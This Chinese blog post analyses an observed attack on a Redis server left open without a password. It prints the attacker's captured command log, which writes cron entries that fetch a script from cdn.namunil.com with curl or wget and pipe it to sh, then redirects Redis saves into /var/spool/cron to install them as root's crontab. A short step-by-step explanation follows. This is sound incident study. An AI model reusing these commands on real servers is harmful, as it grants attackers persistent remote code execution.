[日常] 研究redis未授权访问漏洞利用过程
2023-02-18 15:47:06 时间
前提:redis允许远程连接,不需要密码
1522057495.583846 [0 123.206.24.121:50084] "set" "dUHkp" "\n\n*/1 * * * * curl cdn.namunil.com/sh.php|sh\n" 1522057495.584467 [0 123.206.24.121:50084] "set" "yA" "\n\n*/2 * * * * wget -O- cdn.namunil.com/sh.php|sh\n" 1522057495.585023 [0 123.206.24.121:50084] "set" "HoemuOP" "\n\n*/3 * * * * /usr/bin/curl -qs cdn.namunil.com/sh.php|/bin/sh\n" 1522057495.585650 [0 123.206.24.121:50084] "set" "ehWap" "\n\n*/4 * * * * /usr/bin/wget -q -O- cdn.namunil.com/sh.php|/bin/sh\n" 1522057495.586313 [0 123.206.24.121:50084] "config" "set" "dir" "/var/spool/cron/" 1522057495.587036 [0 123.206.24.121:50084] "config" "set" "dbfilename" "root" 1522057495.587374 [0 123.206.24.121:50084] "save" 1522057495.587827 [0 123.206.24.121:50084] "config" "set" "dir" "/var/spool/cron/crontabs/" 1522057495.588235 [0 123.206.24.121:50084] "save"
1.执行set命令,保存字符串,value 是一条cron规则的形式
2.设置备份文件的目录到cron目录
3.设置备份文件的文件名成root
4.save保存文件,直接把字符串中的cron规则写入了文件
5.cron定时执行,远程脚本里面各种操作
相关文章
- 在 C# CLR 中学习 C++ 之了解 extern
- 在 C# CLR 中学习 C++ 之了解 namespace
- 记一次 .NET 某金融企业 WPF 程序卡死分析
- PerfView专题 (第十二篇):对 C# 下的 SDK 类库进行监控(大结局)
- PerfView专题 (第十一篇):使用 Diff 功能洞察 C# 内存泄漏增量
- PerfView专题 (第十篇):洞察 C# 终结队列引发的内存泄漏
- PerfView专题 (第九篇):洞察 C# 中的 LOH 内存碎片化
- PerfView专题 (第八篇):洞察 C# 内存泄漏之寻找静态变量名和GC模式
- PerfView专题 (第七篇):如何洞察触发 GC 的 C# 代码?
- PerfView专题 (第六篇):如何洞察 C# 中 GC 的变化
- PerfView专题 (第五篇):如何寻找 C# 托管内存泄漏
- PerfView专题 (第四篇):如何寻找 C# 中程序集泄漏
- PerfView专题 (第三篇):如何寻找 C# 中的 VirtualAlloc 内存泄漏
- PerfView专题 (第二篇):如何寻找 C# 中的 Heap堆内存泄漏
- PerfView专题 (第一篇):如何寻找 C# 热点函数
- 记一次 .NET 某工控自动化控制系统 卡死分析
- 记一次 .NET 某智慧物流 WCS系统 CPU 爆高分析
- 聊聊 C++ 右值引用 和 移动构造函数
- 聊聊 C++ 中的几种智能指针 (下)
- 记一次 .NET 某RFID标签管理系统 CPU 暴涨分析